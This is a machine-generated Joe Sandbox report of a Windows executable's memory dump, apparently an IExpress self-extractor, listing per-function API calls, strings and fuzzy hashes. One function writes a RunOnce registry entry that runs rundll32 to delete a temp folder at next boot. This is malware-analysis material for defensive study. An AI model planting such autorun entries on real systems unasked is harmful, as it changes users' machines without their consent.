Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$smo
API String ID: 2418873061-2951332106
Opcode ID: d55253ef6378838292dfe03842463f5cfbcbda6183359b53a0e70fdef66d7d55
Instruction ID: 253ed8cc9d317f0317a800718f82805caa14f0a9973366e40a61068d2cb5c11f
Opcode Fuzzy Hash: d55253ef6378838292dfe03842463f5cfbcbda6183359b53a0e70fdef66d7d55
Instruction Fuzzy Hash: F2512B383402817AEBE55F365C4DF7B29589B86B5AF14C03EF505D52D0CE6CCE02926D

Uniqueness

Uniqueness Score: -1.00%

Function 004C34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000), ref: 004C3535
EndDialog.USER32(?,?), ref: 004C3541
ResetEvent.KERNEL32 ref: 004C355F
SetEvent.KERNEL32(004C1140,00000000,00000020,00000004), ref: 004C3590
GetDesktopWindow.USER32 ref: 004C35C7
GetDlgItem.USER32(?,0000083B), ref: 004C35F1
SendMessageA.USER32(00000000), ref: 004C35F8
GetDlgItem.USER32(?,0000083B), ref: 004C3610
SendMessageA.USER32(00000000), ref: 004C3617
SetWindowTextA.USER32(?,smo), ref: 004C3623
CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,004C8798), ref: 004C3637
EndDialog.USER32(?,00000000), ref: 004C3671

Strings

smo, xrefs: 004C361D

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: smo
API String ID: 2406144884-2762499640
Opcode ID: ccd47aba0ac95d3ab3372eaecdcd4630121fd4ed8c585bf9d45a33bfa28bfd9a
Instruction ID: bf7c7e7ce7138dd9361cb710e6c086b3ba90ea9073b6396e27ded22d911e4e45
Opcode Fuzzy Hash: ccd47aba0ac95d3ab3372eaecdcd4630121fd4ed8c585bf9d45a33bfa28bfd9a
Instruction Fuzzy Hash: F431A239240314BBD7E01F25AC4DF2B3A68E785B06F28853EF602953A0CE798A11DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004C4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 004C4236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 004C424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 004C4263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 004C427A
GetTempPathA.KERNEL32(00000104,004C88C0,?,00000001), ref: 004C429F
CharPrevA.USER32(004C88C0,00991181,?,00000001), ref: 004C42C2
CharPrevA.USER32(004C88C0,00000000,?,00000001), ref: 004C42D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 004C4391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 004C43A5

Strings

SHBrowseForFolder, xrefs: 004C4246
SHELL32.DLL, xrefs: 004C422F
SHGetPathFromIDList, xrefs: 004C4274

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: a6916f6461bb06fe01c3c70347686016c30b5faa3c16576ea462f77d8e157575
Instruction ID: fbb00be6b956c5248140526eb77bc9152f8cb7efc50b2fe56b2d9fceb547ef17
Opcode Fuzzy Hash: a6916f6461bb06fe01c3c70347686016c30b5faa3c16576ea462f77d8e157575
Instruction Fuzzy Hash: FF41F578A00244AFD791AF61DC98FAE7BB4EB85388F14017EE941A3351CF788C05876D

Uniqueness

Uniqueness Score: -1.00%

Function 004C44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON

Download Yara Rule

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004C4518
MessageBoxA.USER32(?,?,smo,00010010), ref: 004C4554
LocalAlloc.KERNEL32(00000040,00000065), ref: 004C45A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 004C45E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 004C460D
MessageBeep.USER32(00000000), ref: 004C4630
MessageBoxA.USER32(?,00000000,smo,00000000), ref: 004C4666
LocalFree.KERNEL32(00000000), ref: 004C466F

Part of subcall function 004C681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 004C686E
Part of subcall function 004C681F: GetSystemMetrics.USER32(0000004A), ref: 004C68A7
Part of subcall function 004C681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004C68CC
Part of subcall function 004C681F: RegQueryValueExA.ADVAPI32(?,004C1140,00000000,?,?,0000000C), ref: 004C68F4
Part of subcall function 004C681F: RegCloseKey.ADVAPI32(?), ref: 004C6902

Strings

LoadString() Error. Could not load string resource., xrefs: 004C44E4
smo, xrefs: 004C4545, 004C465A

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$smo
API String ID: 3244514340-2161240188
Opcode ID: ff18a73129b11755171c7fea0c8cd97fd6e4dda2be8529c7dbfd7c838531be16
Instruction ID: 7625a44225cd51acef1f656504972c6c06dc3bafa6196b460e1d0bbdbdcddc71
Opcode Fuzzy Hash: ff18a73129b11755171c7fea0c8cd97fd6e4dda2be8529c7dbfd7c838531be16
Instruction Fuzzy Hash: FB511879A001196FDBA19F28CD58FAB7B68EF85304F1441AEFD09A3241DB39DD05CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004C2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON

Download Yara Rule

APIs

CharUpperA.USER32(C9787856,00000000,00000000,00000000), ref: 004C27A8
CharNextA.USER32(0000054D), ref: 004C27B5
CharNextA.USER32(00000000), ref: 004C27BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004C2829
RegQueryValueExA.ADVAPI32(?,004C1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004C2852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004C2870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004C28A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 004C28AA
GetSystemDirectoryA.KERNEL32(-00000005,00000104), ref: 004C28B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 004C27E4

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: c8f07c56672904057a493e7fef2671a03d958bd22724dc6ee7f0b91e8a8d093a
Instruction ID: 3464a84ee3e6a72ced2d2a1a92068a851813b2d962cd2b1fba2f11a3652f369f
Opcode Fuzzy Hash: c8f07c56672904057a493e7fef2671a03d958bd22724dc6ee7f0b91e8a8d093a
Instruction Fuzzy Hash: 2A41D67490012CAFDBA4AF659C45FEA77BCEB15304F0040AEF545D2110CBF88E858FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004C2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 004C22A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 004C22D8
memset.MSVCRT ref: 004C22F5
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004C2305
RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 004C236E
RegCloseKey.ADVAPI32(?), ref: 004C237A

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 004C2299
wextract_cleanup1, xrefs: 004C227C, 004C22CD, 004C2363
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 004C232D
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C2321

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
API String ID: 3027380567-2601155950
Opcode ID: cafc5952362bf894a695aea884555d92666fe2bad579da1c38a64a8dd49b6180
Instruction ID: a9a376a7bd52bebca988011721f41a28b9ba6bc1a75f9c72978559f8fa72436a
Opcode Fuzzy Hash: cafc5952362bf894a695aea884555d92666fe2bad579da1c38a64a8dd49b6180
Instruction Fuzzy Hash: F631FC759002187BDBA19F61DC49FEB777CEF54744F0001EEB90D96051DAB85F44CA54

Uniqueness

Uniqueness Score: -1.00%

Function 004C3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 004C313B
GetDesktopWindow.USER32 ref: 004C314B
SetDlgItemTextA.USER32(?,00000834), ref: 004C316A
SetWindowTextA.USER32(?,smo), ref: 004C3176
SetForegroundWindow.USER32(?), ref: 004C317D
GetDlgItem.USER32(?,00000834), ref: 004C3185
GetWindowLongA.USER32(00000000,000000FC), ref: 004C3190
SetWindowLongA.USER32(00000000,000000FC,004C30C0), ref: 004C31A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 004C31CA

Strings

smo, xrefs: 004C3170

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: smo
API String ID: 3785188418-2762499640
Opcode ID: 763bf7e2a92c40784a5bd58aeb3b7616ccf9b2aa2f898bcadc3b764c79179f69
Instruction ID: 83e80a049d74f9714411b5e7493b2dda759dbe12f309f786c267696585f7e1b9
Opcode Fuzzy Hash: 763bf7e2a92c40784a5bd58aeb3b7616ccf9b2aa2f898bcadc3b764c79179f69
Instruction Fuzzy Hash: 4511E735204125BFDBD15F249C0CF9B3A64EB46726F18823AF811912E0DF799A51D74E

Uniqueness

Uniqueness Score: -1.00%

Function 004C18A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004C17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,004C18DD), ref: 004C181A
Part of subcall function 004C17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 004C182C
Part of subcall function 004C17EE: AllocateAndInitializeSid.ADVAPI32(004C18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,004C18DD), ref: 004C1855
Part of subcall function 004C17EE: FreeSid.ADVAPI32(?,?,?,?,004C18DD), ref: 004C1883
Part of subcall function 004C17EE: FreeLibrary.KERNEL32(00000000,?,?,?,004C18DD), ref: 004C188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 004C18EB
OpenProcessToken.ADVAPI32(00000000), ref: 004C18F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 004C190A
GetLastError.KERNEL32 ref: 004C1918
LocalAlloc.KERNEL32(00000000,?,?), ref: 004C192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 004C1944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004C1964
EqualSid.ADVAPI32(00000004,?), ref: 004C197A
FreeSid.ADVAPI32(?), ref: 004C199C
LocalFree.KERNEL32(00000000), ref: 004C19A3
CloseHandle.KERNEL32(?), ref: 004C19AD

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 8e51200859b9dfa9dbebda2428adc21f8b5ed2e7107c749bfdf729863b8ec1c7
Instruction ID: 129a4390a416318bcd992d7e9165cea4370b8b7d87cfc7fa7fa5deb149839566
Opcode Fuzzy Hash: 8e51200859b9dfa9dbebda2428adc21f8b5ed2e7107c749bfdf729863b8ec1c7
Instruction Fuzzy Hash: B2313EB5A00209AFDB909FA6DC58EBFBBB8FF05344F10043AE545D2161DB349915CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004C468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46A0
SizeofResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46C3
LoadResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46CC
LockResource.KERNEL32(00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46D3
memcpy_s.MSVCRT ref: 004C46E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46EF

Strings

TITLE, xrefs: 004C469D, 004C46C0
smo, xrefs: 004C46E4

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$smo
API String ID: 3370778649-3033500379
Opcode ID: 23ea8c2a430357e0bdcf11824021c0ecee555ceb647860e1996f2befcaaaf2fa
Instruction ID: 048df8e2def0e39d793d8fb8c09d7dc5ea57610f40dd343eb69b28fe8e1bf286
Opcode Fuzzy Hash: 23ea8c2a430357e0bdcf11824021c0ecee555ceb647860e1996f2befcaaaf2fa
Instruction Fuzzy Hash: 9701F93A3402147BF3901BA65D0CF6B3E2CDBC6F95F040039FA4A87240C975885182BE

Uniqueness

Uniqueness Score: -1.00%

Function 004C681F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 004C686E
GetSystemMetrics.USER32(0000004A), ref: 004C68A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004C68CC
RegQueryValueExA.ADVAPI32(?,004C1140,00000000,?,?,0000000C), ref: 004C68F4
RegCloseKey.ADVAPI32(?), ref: 004C6902

Part of subcall function 004C66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,004C691A), ref: 004C6741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 004C68C2
;FL, xrefs: 004C6940

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: ;FL$Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-416664521
Opcode ID: 3c895d6042718b98c6832cbc48725b89145377f823f599b875e2892e1ad0e5c1
Instruction ID: 65e4f93a79ff63278b5d6561475346918b167da61e813dbb09159ffa2d3ee43a
Opcode Fuzzy Hash: 3c895d6042718b98c6832cbc48725b89145377f823f599b875e2892e1ad0e5c1
Instruction Fuzzy Hash: 1731D479A002289FDBA1CF15CC04FABB7B8FB41358F0541BEE909A2250CB349D85CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 004C17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,004C18DD), ref: 004C181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 004C182C
AllocateAndInitializeSid.ADVAPI32(004C18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,004C18DD), ref: 004C1855
FreeSid.ADVAPI32(?,?,?,?,004C18DD), ref: 004C1883
FreeLibrary.KERNEL32(00000000,?,?,?,004C18DD), ref: 004C188A

Strings

advapi32.dll, xrefs: 004C1810
CheckTokenMembership, xrefs: 004C1826

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 2612d18a2e706a7301edbec088a191fc5f21b2d7d972f2ed34fc70d732e33ce5
Instruction ID: a879a85ced7df049058d3b32c2b648acbe9add63d911a938743c6421ae58cc23
Opcode Fuzzy Hash: 2612d18a2e706a7301edbec088a191fc5f21b2d7d972f2ed34fc70d732e33ce5
Instruction Fuzzy Hash: 9F118475E00209ABDB509FA5DC49FBFBB78EB49744F10017EFA01E2291DA348D1087A9

Uniqueness

Uniqueness Score: -1.00%

Function 004C3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 004C3490
GetDesktopWindow.USER32 ref: 004C349A
SetWindowTextA.USER32(?,smo), ref: 004C34B2
SetDlgItemTextA.USER32(?,00000838), ref: 004C34C4
SetForegroundWindow.USER32(?), ref: 004C34CB
EndDialog.USER32(?,00000002), ref: 004C34D8

Strings

smo, xrefs: 004C34AC

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: smo
API String ID: 852535152-2762499640
Opcode ID: 4680d3445356bde9c9f378fad34bec6f704d753eca4a8e52af083365bb35361f
Instruction ID: 96110672fb952926cfc1bcb417666969cbea7caf5849faab71e01a9cf13cf7b8
Opcode Fuzzy Hash: 4680d3445356bde9c9f378fad34bec6f704d753eca4a8e52af083365bb35361f
Instruction Fuzzy Hash: 3A01F539240118BBD7DE5F65DD0CE6E3A24EB05706F04802AF902826A0CF389F52DB8E

Uniqueness

Uniqueness Score: -1.00%

Function 004C2AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 004C2AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 004C2AF2
CharNextA.USER32(?), ref: 004C2B12
CharUpperA.USER32 ref: 004C2B1E
CharPrevA.USER32(?,?), ref: 004C2B55
CharNextA.USER32(?), ref: 004C2BD4

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: a53f53902d70767f13cd60059c7f60288df1e4b2ce69930d31b57196010196ee
Instruction ID: 987f56f9288c9e36cfed0c4808f7f8f21b38eaec943d1867278906814b46661e
Opcode Fuzzy Hash: a53f53902d70767f13cd60059c7f60288df1e4b2ce69930d31b57196010196ee
Instruction Fuzzy Hash: F24104385042855FDB959F348C14FFE7B699F52304F1800AFD8C283202EFB99E468B59

Uniqueness

Uniqueness Score: -1.00%

Function 004C28E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 004C2A6F

Part of subcall function 004C2773: CharUpperA.USER32(C9787856,00000000,00000000,00000000), ref: 004C27A8
Part of subcall function 004C2773: CharNextA.USER32(0000054D), ref: 004C27B5
Part of subcall function 004C2773: CharNextA.USER32(00000000), ref: 004C27BC
Part of subcall function 004C2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004C2829
Part of subcall function 004C2773: RegQueryValueExA.ADVAPI32(?,004C1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004C2852
Part of subcall function 004C2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004C2870
Part of subcall function 004C2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004C28A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,004C3938,?,?,?,?,-00000005), ref: 004C2958
GlobalLock.KERNEL32(00000000,?,?,?,?,?,?,?,?,004C3938,?,?,?,?,-00000005,?), ref: 004C2969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,004C3938,?,?,?,?,-00000005,?), ref: 004C2A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004C3938,?,?), ref: 004C2A81

Strings

89L, xrefs: 004C293D, 004C297E, 004C2940

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID: 89L
API String ID: 3949799724-2765614395
